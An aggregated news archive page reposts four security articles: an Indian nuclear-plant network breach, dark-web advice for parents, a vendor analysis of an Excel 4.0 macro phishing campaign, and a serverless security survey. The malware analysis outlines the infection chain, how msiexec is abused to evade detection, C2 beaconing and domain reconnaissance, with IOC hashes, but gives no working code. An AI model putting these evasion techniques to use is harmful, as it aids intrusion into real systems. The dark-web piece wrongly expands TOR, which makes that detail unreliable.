Daily Archives: November 2, 2019

#cybersecurity | #hackerspace | Analyst Discusses Reporting Hack Of Computer System At Indian Nuclear Reactor | Avast

Source: National Cyber Security – Produced By Gregory Evans

This week a report of hackers gaining access to an Indian nuclear power plant’s computer network led to alarm, confusion, and denial before officials admitted the hack took place. The threat analyst who reported the issue experienced a unique vantage point in the middle of that furious cybersecurity news cycle. 

Threat analyst Pukhraj Singh (pictured) reported the breach of the domain controller at the Kudankulam Nuclear Power Plant to India’s National Cyber Security Coordinator on Sept. 3, and follow-up emails were exchanged. But for nearly two months the government did not reveal the incident. When Singh disclosed the attack on Twitter on Oct. 28, the government appeared to deny it before confirming the attack a day later. 

The hack was tied to North Korea, and is comparable to a Russian hack of American facilities disclosed last year by the U.S. government. Given the impact of state-sponsored attacks of power grids and utilities, the Indian government’s confusing response was central to a swirl of conflicting news reports and social media. In the eye of the storm was Singh, the former government cybersecurity analyst who brought the hack forward to the government and the public. (Singh emphasizes that he did not discover the intrusion, but helped threat researchers who did not wish to be named.)

“My Twitter profile is flooded,” he said, including tweets that misinterpreted the intrusion to be a hack of the nuclear reactor itself. “I have been repeatedly trying to clarify that. It’s not my job or motive to figure out if the control systems were compromised.” The Indian government has said that the plant and other Indian nuclear power plant control systems cannot be hacked because they stand alone and are not connected to outside cyber networks or the Internet.

But Singh says “extremely mission-critical targets were hit” in an attack that could have involved high-level espionage. “A domain controller authenticates and authorizes other resources and entities on the network. It’s the most privileged vantage point attackers can have. The intruders sat on it. They were onto something – probably espionage.”

Singh says he is “not in a position to talk about the government’s response. I did notify the topmost echelon of the cyber establishment.” But he does say his biggest takeaway from the entire episode is that “Communication is the key. Responsible disclosure is a win, and a strategic maneuver to turn the tables against the adversary.”

Luis Corrons, a security evangelist for Avast, said keeping nuclear reactors’ energy-production systems offline is critical. “Thank God humans are aware of their limitations and nuclear reactors are not connected to the Internet. But computer networks like this one and other industries and facilities are increasingly connected to the Internet, and public safety is involved. An example was the attacks suffered in Ukraine where portions of the population were without electricity in winter because of a cyberattack. Mr. Singh is correct: Information is the key, and government officials have a responsibility to keep citizens apprised of events as much as national security allows.” 

Learn more about how nations hack each other and how to respond to a data breach on The Avast Blog. You can find resources on national security cyberthreats and sign up for security alerts with the U.S. Cybersecurity and Infrastructure Security Agency.

Source link

The post #cybersecurity | #hackerspace |<p> Analyst Discusses Reporting Hack Of Computer System At Indian Nuclear Reactor | Avast <p> appeared first on National Cyber Security.

View full post on National Cyber Security

hacker proof, #hackerproof




#deepweb | Protect your kids from the rabbit hole of the dark web

Source: National Cyber Security – Produced By Gregory Evans

The dark web is that unregulated corner of the cyberspace where illegal deals and criminal schemes are hatched. It is also easily accessible to children, which should give parents serious cause for concern.

 

The Internet is a huge playground that sees data, devices, and people interacting on an unparalleled scale. It is informative and helpful, but, just like a physical playground, there is scope for damage in the online realm, especially for younger users who might not be fully aware of the danger that lurks just beneath the surface: the dark web.

What is the dark web and why is it dangerous?

As the name suggests, the dark web is the darker aspect of the digital world that we are oh-so-familiar with today. It derives its existence from the deep web, which, in its original form, was supposed to be an unindexed portion of the cyberspace that provided users with anonymity and privacy. The lack of visibility and regulation that exemplified the dark web, however, was taken advantage of by malicious actors to create something far more dangerous and nefarious.

Today, the dark web is a place where all kinds of criminals and less savoury elements of society come together to buy, sell and share everything illegal and unethical in the real world. In those shadowy corners of the World Wide Web thrive dangers ranging from identity theft and narcotics/weapons trade, to suicide chatrooms and child pornography.

Take the “Blue Whale Challenge”, for instance, which preyed on the need for peer acceptance in young children. Luring users in with innocuous tasks that progressively became riskier and more damaging, with elements of self-harm, cyberbullying, and online shaming involved. The phenomenon is thought to be responsible for several unrelated suicides amongst children and young adults globally.

Imagine your child exposed to such a harmful influence. Not a pleasant thought at all, is it?

What makes the dark web all the more dangerous is the ease with which it can be accessed. Private networks like TOR (The Online Routers) and I2P (Invisible Internet Projects) give young children a gateway into the horrific and alluring content in the depths of the dark web. Unbeknownst to their parents, kids often dive deep down into this secret yet dangerous rabbit hole through their PCs, laptops, and smartphones—unmonitored, unregulated and unnoticed.

So, if you want to prevent your child from being exposed to such harmful influences, here are a few measures that you can implement to protect them against the dangers of the dark web.

Keep a check: While your ward’s privacy should be valued and respected, as a parent, you also have to don the hat of a regulator and protector. This makes it important for you to constantly check their digital devices and the kind of software, applications and tools that they use—especially those which require TOR or I2P access. It is also advisable to monitor your child’s online time and activities, whom they interact with, and their behaviour.

Educate and talk to your children: Young children typically seek attention elsewhere when they feel they’re not getting enough at home. This is why you must spare some time to initiate friendly conversations with your children. Talk to them about their likes/dislikes, interests and concerns, as well as any new developments in their lives, in a non-intrusive manner. This will help you develop a comfortable equation that encourages your child to be more forthcoming with you and will allow you to educate them about critical issues, such as narcotic use, sex education, bullying, online information sharing and violent behaviour.

Take them out for a digital detox: Today, we spend more time with digital devices than ever before. Your kids, if anything, are even more addicted to technology. This is why it is important to help them break away from their screens by undertaking simple yet relaxing physical activities. It could be spending time as a family, learning a new hobby, or just a walk in the park. If you begin inculcating this habit from a young age, you won’t even know when it becomes a part and parcel of their everyday lives.

Stay in touch with them through smart gadgets: Yes, you heard it right. Smartwatches that connect you to your child’s phone through an app are indeed a good way to track their activities. You can buy such smartwatches online or in gadgets showrooms nearby and be the digitally-savvy parent that your child needs and deserves.

Monitor their online purchases: If you’ve given your child a credit/debit card of their own, it is always best to link it to your account. This gives you visibility into any online transactions that your child makes, as well as where they are making their purchases from. It is also advisable to keep track of their online orders and empty delivery cartons. Also, check if your ward has access to anonymous currencies such as bitcoin; this can be easily gauged by tracking the package details and mode of payment.

The Internet, like most things in life, is both a boon and a curse. In the right hands and with the right guidance, it can be a pathway to unparalleled opportunities for learning and growth. Without proper regulation, however, it can be extremely destructive and may negatively impact your child’s future. As a modern parent, it is your responsibility to ensure that young children remain protected from the various threats online—and following the aforementioned tips might just help you save your young one from walking the harrowing path of the dark web.

The author is founder and director, Shemford Group of Futuristic Schools

 

Source link
——————————————————————————————————

The post #deepweb | <p> Protect your kids from the rabbit hole of the dark web <p> appeared first on National Cyber Security.

View full post on National Cyber Security

hacker proof, #hackerproof




#cybersecurity | Attacker uses tricky technique of Excel 4.0 in Malspam campaign

Source: National Cyber Security – Produced By Gregory Evans

Estimated reading time: 5 minutes

Use of Phishing emails is not new for cyber-attack and is still one of the classic strategies to compromise a victim’s machine. Cyber criminals lure victims to open email attachments (mostly Doc and XLS files) by faking them to look like important one using keywords like invoice, payment, finance, order etc. Quick Heal Security Labs observed one such type of attack to compromise the victim.

Overview:

In this attack, attacker first sends a phishing email disguised as an important one  and containing an excel document as attachment. Here is a Phishing email which was tracked during this research.

Fig.1: Phishing email with excel file as attachment

On opening this excel document, it asks victim to “enable macro” content to execute malicious VBA macro code in background.

Fig.2: Prompt requesting to enable Macros

There has been a rise in the use of VBA macro in Phishing attacks and this trend is not new. There are ways to detect this attack easily. Hence attackers have changed their exploitation technique and are using Excel 4.0 macro these days.

Excel 4.0 Macro technique is old but still effective as all versions of Excel can run Excel 4.0 macros. In this technique, macros are not stored in a VBA project, but are placed inside cells of a spreadsheet containing functions like Exec(), Halt(), Auto_Open() etc. To trick the victim, attackers leverage hiding feature of spreadsheet and store the macros inside it.

Following is an example that shows the actual macro code is hidden inside other excel sheet and using unhide option that sheet can be seen as shown in Fig 3.

Fig.3: Unhiding Excel Sheet

 

Below figure shows the exact code and flow of execution.

Fig.4: Macro Code Execution

Auto_Open() is a function used to execute a code as soon as workbook is opened.

We can see in Fig.4, Auto_Open function will execute Macro1() which means code execution will start from Row 4 which is Macro1. After that, it will call Macro2 (step 2) and then next instruction which is 33 (on Row 14) is executed. In step 3, 1st stage payload is being downloaded at %temp% folder using msiexec.exe process as shown in Fig 5.

While msiexec.exe is a legitimate Microsoft process, it is one of the binary from living of the land which belongs to the Windows Installer Component. Hackers are making use of this process to download payload as many security solutions treat this as Whitelisted process which makes it difficult to detect using behaviour detection technique.

Fig.5: Download of 1st Stage Payload

 

Executable Analysis:

After downloading a payload, msiexec.exe is also responsible to execute the payload and performs further activity. The 1st stage payload is just a dropper which is used to drop multiple files in the %temp% folder. Finally, it drops a .dll file which acts as final stage payload and it is used to perform further malicious activities.

The final stage payload is executed by Rundll32.exe with argument of function name as “sega”. It starts collecting system information such as number of running tasks, system id, user is part of domain or not, drive usages etc.

Fig.6: Execution flow of Attack

Final payload drops a PowerShell script which is responsible to check whether user is part of domain or not. The dropped PowerShell script is stored at %temp% location in obfuscated format.

After collecting required information from victim’s machine, payload starts encoding data using simple URL encoding and sends data using POST method to its C2 server.

Fig. 7: Data send using POST method

Here is the screenshot of the decoded data:

Fig. 8: Decoded data

C2 Server responds with a command after getting the details.

According to response, payload performs action on victim’s machine as it executes a net.exe with command “net user /domain” and collects the information and sends back to C2 server.

Some of following functions are used while sending data to C2 server.

Fig. 9: C2 communication API calls

This payload also creates a global mutex to execute payload only for one occurrence.

Fig. 10: Create global mutex

The main purpose of this malware is to create a backdoor which can be used to steal system data and if system is in domain, it may perform a lateral movement to create a backdoor network.

Conclusion:

Use of social engineering tricks to compromise victim is a typical method and hackers always keep changing their techniques to evade AV detections by using new ideas like Excel 4.0 macro and genuine windows process like msiexec.exe. Quick Heal and Seqrite enterprise security solutions protect its users from such malicious email attachments and can also help in identifying remote Command and Control server communication. So, remember to keep the endpoint security solutions always updated.

IOCs:

78EA9835C2D7F6760315EA043807B8C8

34B769FA431AC1945BE9CC33D4CC2426

DDAE8B7AA9A93CE17610EB063F5838CE

6675C63A2534FD65B3B2DA751F2B393F

 

Subject Matter Expert:

Anjali Raut, Aniruddha Dolas

 

 

Have something to add to this story? Share it in the

Source link

The post #cybersecurity | Attacker uses tricky technique of Excel 4.0 in Malspam campaign appeared first on National Cyber Security.

View full post on National Cyber Security

hacker proof, #hackerproof




#cybersecurity | #hackerspace | State of Serverless and Security

Source: National Cyber Security – Produced By Gregory Evans

Trends in Serverless Adoption

Serverless adoption has been increasing drastically over the past 18 months- outpacing other cloud infrastructure environments. Given this, Protego Labs has surveyed top security, development, and DevOps professionals from over 30 organizations to get their perspective on serverless adoption and the role security has played in this growth in The State of Serverless and Security Survey.

As seen in other research, AWS Lambda continues to lead the way for serverless deployments making up 84% of all serverless deployments. 35% of organizations surveyed said that their company spends more than 25% of their total IT budget on cloud technologies, and 82% agreed that their organization would benefit from further investment in the cloud across other areas of their organization. Market Research reports that the CAGR for serverless is 26% over the next five years, which supports the finding that 48% of those surveyed feel that serverless is the future of the cloud.

What about Serverless Security?

But where does this leave security, and are organizations ready to fully embrace serverless? In order to fully embrace serverless, 66% said that securing their serverless deployments are their top priority. And there is no wonder, with hundreds of functions to manage, having confidence in the security of each function is a daunting task. 53% of those surveys state that they don’t have proper visibility into their serverless functions. This contributes to 68% of organizations not having confidence in the security of their serverless deployments. 

So what does this mean? Serverless provides a great opportunity for organizations to expedite application development and save infrastructure expenses, but organizations must be prepared to view their application security risks in a new light. Managing serverless functions and analyzing code manually is not realistic – it is too easy for organizations to lose visibility and control. Luckily there are tools that allow organizations to streamline this process for greater visibility, security, and ultimately – regain control so they can fully embrace the opportunities of serverless. 

For more information on these tools, check out this short video to show how easy it is to build your compliance rules and restrictions into your serverless applications. 

 

The post State of Serverless and Security appeared first on Protego.

*** This is a Security Bloggers Network syndicated blog from Blog – Protego authored by Trisha Paine. Read the original post at: https://www.protego.io/state-of-serverless-and-security/

Source link

The post #cybersecurity | #hackerspace |<p> State of Serverless and Security <p> appeared first on National Cyber Security.

View full post on National Cyber Security

hacker proof, #hackerproof